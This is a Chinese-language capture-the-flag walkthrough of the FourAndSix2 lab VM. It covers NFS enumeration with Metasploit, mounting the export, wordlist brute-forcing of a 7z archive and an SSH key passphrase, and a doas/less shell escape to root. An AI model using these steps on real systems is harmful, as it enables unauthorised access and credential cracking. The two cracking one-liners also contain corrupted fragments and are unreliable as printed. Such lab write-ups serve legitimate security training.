FourAndSix2 靶机渗透

0x01 简介 FourAndSix2是易受攻击的一个靶机，主要任务是通过入侵进入到目标靶机系统然后提权，并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址： https://download.vulnhub.com/fourandsix/FourAndSix2.ova   0x02 信息收集 1.通过存活主机发现，确定目标机器IP 2.端口扫描发现 3.发现开放nfs服务，搜索漏洞利用代码 0x03 漏洞利用 msf5 > search nfs   Matching Modules ================   # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/freebsd/nfsd/nfsd_mount normal No FreeBSD Remote NFS RPC Request Denial of Service 1 auxiliary/scanner/nfs/nfsmount normal Yes NFS Mount Scanner 2 exploit/netware/sunrpc/pkernel_callit 2009-09-30 good No NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow 3 exploit/osx/local/nfs_mount_root 2014-04-11 normal Yes Mac OS X NFS Mount Privilege Escalation Exploit 4 exploit/windows/ftp/labf_nfsaxe 2017-05-15 normal No LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow 5 exploit/windows/ftp/xlink_client 2009-10-03 normal No Xlink FTP Client Buffer Overflow 6 exploit/windows/ftp/xlink_server 2009-10-03 good Yes Xlink FTP Server Buffer Overflow 7 exploit/windows/nfs/xlink_nfsd 2006-11-06 average No Omni-NFS Server Buffer Overflow     msf5 > use auxiliary/scanner/nfs/nfsmount msf5 auxiliary(scanner/nfs/nfsmount) > show options   Module options (auxiliary/scanner/nfs/nfsmount):   Name Current Setting Required Description ---- --------------- -------- ----------- PROTOCOL udp yes The protocol to use (Accepted: udp, tcp) RHOSTS yes The target address range or CIDR identifier RPORT 111 yes The target port (TCP) THREADS 1 yes The number of concurrent threads   msf5 auxiliary(scanner/nfs/nfsmount) > set rhosts 192.168.190.134 rhosts => 192.168.190.134 msf5 auxiliary(scanner/nfs/nfsmount) > run   [+] 192.168.190.134:111 - 192.168.190.134 NFS Export: /home/user/storage [] [*] 192.168.190.134:111 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/nfs/nfsmount) > 查看目标系统可挂载目录 或者使用showmount -e 192.168.190.134 查看目标系统可挂载目录 mount -t nfs 192.168.190.134:/home/user/storage /mnt # 将目标机器/home/user/storage挂载本地 发现备份文件 7z解压： # 7z e yajiu.7z --- 不实用 这条命令是将yajiu.7z中的所有文件解压出来，e是解压到当前路径   # 7z x yajiu.7z --- 正确的解压方法 这条命令是将yajiu.7z中的所有文件解压出来，x是解压到压缩包命名的目录下   使用 7z x backup.7z 解压备份文件 ，居然提示需要密码$$ 2.压缩包爆破 root@kali:/mnt# rar rar2john rarp rarun2 root@kali:/mnt# rar rar2john rarp rarun2 root@kali:/mnt# apt-get install rarcrack   rarcrack使用方法 执行命令: rarcrack 文件名 --threads 线程数 --type rar|zip|7z 也可以使用7z破解脚本https://github.com/exexute/PythonScaffold/tree/PythonScaffold_0.1/enum_violence/file_enum   Usage: ./7z-crack.sh <target_file.7z> <wordlist_file> Example: ./7z-crack.sh /tmp/backup.7z /usr/share/wordlists/rockyou.txt How to use id_rsa-crack.sh? Usage: ./id_rsa-crack.sh <target_file> <wordlist_file> Example: ./id_rsa-crack.sh /tmp/id_rsa /usr/share/wordlists/rouckyou.txt   7z-crack.sh脚本： cat $2 | while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$li aec ne;break;fi;done 破解出了密码：chocolate 解压出来一堆HelloKitty，还有一对公钥（id_rsa.pub）和私钥（id_rsa）。 通过查看公钥找到用户名，将私钥拷贝到/root/.ssh目录，尝试使用RSA私钥登录 无法登录，还需要输入密码 使用id_rsa-crack.sh工具破解id_rsa文件的密码 https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/id_rsa-crack.sh   id_rsa-crack.sh脚本： cat /usr/share/wordlists/rockyou.txt | while read line;do if ssh-keygen -p -P $line -N $line -f /tmp/test/id_rsa 1>/dev/null 2>/dev/null;then echo "PASSWORD FOUND : "$ 576 line;break;fi;done; 使用ssh登录目标机器后发现目标系统是OpenBSD6.4， 搜索未发现6.4内核存在提权漏洞。 使用find命令来定位设置了SUID的文件 find / -perm -u=s -type f 2>/dev/null doas是BSD系列系统下的权限管理工具，类似于Debian系列下的sudo命令,我们可以利用它来提权 查看doas的配置文件doas.conf，可以看到doas 允许用户以root权限通过less 查看/var/log/authlog日志文件 fourandsix2$ cat doas.conf permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog permit nopass keepenv root as root doas /usr/bin/less /var/log/authlog 使用doas查看到日志信息，此时按v进行编辑模式，退出编辑模式，输入!/bin/sh提升到root权限 在root目录下发现flag.txt，acd043bc3103ed3dd02eee99d5b0ff42